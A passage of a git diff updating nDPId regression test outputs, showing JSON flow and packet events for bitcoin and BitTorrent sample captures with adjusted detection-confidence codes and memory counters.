-00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-payload-len":539032,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1301329810839} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 637/637 @@ -48,9 +48,9 @@ ~~ total active/idle flows...: 6/6 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5901424 bytes -~~ total memory freed........: 5901424 bytes -~~ total allocations/frees...: 118773/118773 +~~ total memory allocated....: 6035058 bytes +~~ total memory freed........: 6035058 bytes +~~ total allocations/frees...: 121535/121535 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1833 chars diff --git a/test/results/bittorrent.pcap.out b/test/results/bittorrent.pcap.out index cb509347d..e19d4d65b 100644 --- a/test/results/bittorrent.pcap.out +++ b/test/results/bittorrent.pcap.out 
@@ -2,62 +2,62 @@ 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455469967246} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="} 
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
01344{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1455469967465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":624,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":624,"pkt_l4_len":590,"thread_ts_msec":1455469967465,"pkt":"xCwDBkn+LFbcjDU0CABFAAJiKFpAAHUG7uJSOthzwKgBA5Whzpinc5NTxcwDkoAZ\/SDtQgAAAQEICgCEQ0UZ2\/AZNDppcHY0NDpSOthzMTI6Y29tcGxldGVfYWdvaTllMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGkzODMwNWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI4ODhlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/7\/\/\/\/\/\/\/\/\/\/\/v\/\/\/\/\/9\/b\/v\/\/\/\/\/\/\/\/\/+\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/+\/3\/9\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/++\/\/\/\/\/\/\/\/\/3\/\/\/9\/\/\/\/f\/9\/\/\/\/\/9\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/7\/\/\/\/+AAAAABQQAAAJlAAAABQQAAALYAAAABQQAAAB+AAAABQQAAACJAAAABQQAAAE5AAAABQQAAAARAAAABQQAAAK+AAAABQQAAAMvAAAABQQAAAKkAAAABQQAAAGlAAAABQQAAADmAAAABQQAAAHxAAAABQQAAANdAAAABQQAAABXAAAABQQAAADTAAAABQQAAANxAAAABQQAAAJrAAAABQQAAACTAAAABQQAAAFjAAAABQQAAALoAAAABQQAAACGAAAABQQAAAG8AAAABQQAAAMMAAAABQQAAAGu"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967550,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4KZJAAEAGAADAqAEDUjlhU86Xz5EMkOfxIylUooAY70J1ogAAAQEIChnb8UUAFHnUE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhJMcBHQL4ndrvA="} -00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967550,"flow_last_seen":1455469967550,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967550,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1455469967858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1455469967858,"pkt":"xCwDBkn+LFbcjDU0CABFAACkC49AAHcGgo1SOWFTwKgBA8+RzpcjKVSiDJDoNYAYAQJHBAAAAQEICgAUefwZ2\/FFE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wornNx4q0nl1XkqQAAADnFABkMTplaTBlNDppcHY0NDpSOWFTMTI6Y29tcGxldGVfYWdvaTNlMQ=="} 01304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1455469968002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":593,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":593,"pkt_l4_len":559,"thread_ts_msec":1455469968002,"pkt":"xCwDBkn+LFbcjDU0CABFAAJDC5FAAHcGgOxSOWFTwKgBA8+RzpcjKVUSDJDoNYAZAQLSoQAAAQEICgAUef4Z2\/FFOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUzMTM3ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1Mjg4N2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/7\/\/93\/\/\/\/\/\/\/\/\/\/\/+f\/\/\/\/\/7\/\/\/3\/\/\/\/\/\/\/\/v\/\/\/v\/+\/\/3\/\/\/\/\/9\/\/\/\/\/\/1\/\/\/f\/\/v9\/\/\/\/\/\/\/\/\/91\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAtIAAAAFBAAAAngAAAAFBAAAAeYAAAAFBAAAAUUAAAAFBAAAAskAAAAFBAAAA
GcAAAAFBAAAArYAAAAFBAAAAVgAAAAFBAAAAQEAAAAFBAAAAjMAAAAFBAAAAqAAAAAFBAAAAMoAAAAFBAAAAxIAAAAFBAAAAlIAAAAFBAAAAc8AAAAFBAAAAkMAAAAFBAAAAagAAAAFBAAAAhsAAAAFBAAAAzgAAAAFBAAAAacAAAAFBAAAAxQAAAAFBAAAAw4AAAAFBAAAAVwAAAAFBAAAAqI="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969259,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4K5tAAEAGAADAqAEDU9i48c6fyNXli2jySWt7B4AYK\/LO3wAAAQEIChnb9+x4G0bsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjvi3q9Fc8jVIrp0="} -00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI 
(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969259,"flow_last_seen":1455469969259,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969259,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1455469969318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":148,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":148,"pkt_l4_len":114,"thread_ts_msec":1455469969318,"pkt":"xCwDBkn+LFbcjDU0CABFYACGozdAADIG1mVT2LjxwKgBA8jVzp9Ja3sH5YtpNoAYECl7XAAAAQEICngbRx8Z2\/fsE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qniMLxLorRFP2hZAAAAEAFABkMTplaTBlNA=="} 
01379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1455469969391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":648,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":648,"pkt_l4_len":614,"thread_ts_msec":1455469969391,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ6SOJAADIGLsdT2LjxwKgBA8jVzp9Ja3tZ5YtpNoAYECl87wAAAQEICngbR0YZ2\/gmOmlwdjQ0OlPYuPE0OmlwdjYxNjr+gAAAAAAAAOoGiP\/+zfQTMTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk1MTQxM2U0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAxLjguODI6eXBpNTI4OTVlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/3\/\/\/\/\/7\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/b\/\/\/f\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/9\/\/\/\/7\/\/\/\/\/\/\/99\/\/\/\/\/\/3\/\/97\/v\/\/\/\/\/9\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f\/\/\/\/\/\/7\/\/\/X\/\/\/\/9\/\/+AAAAABQQAAAG6AAAABQQAAAITAAAABQQAAAHTAAAABQQAAAA1AAAABQQAAAAQAAAABQQAAAHdAAAABQQAAAMaAAAABQQAAAE+AAAABQQAAANHAAAABQQAAAN+AAAABQQAAAIEAAAABQQAAAHOAAAABQQAAAGSAAAABQQAAAC8AAAABQQAAANcAAAABQQAAAGMAAAABQQAAABAAAAABQQAAAFbAAAABQQAAAEBAAAABQQAAACdAAAABQQAAADUAAAABQQAAAC\/AAAABQQAAAKPAAAABQQAAANe"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469969441,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4XbBAAEAGAADAqAEDTzXkAs6gOSOymifHI+P1WoAYmwf1TQAAAQEIChnb+J8AAH2QE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjqb8v2rPEXkzqd0="} -00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7580000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469969441,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 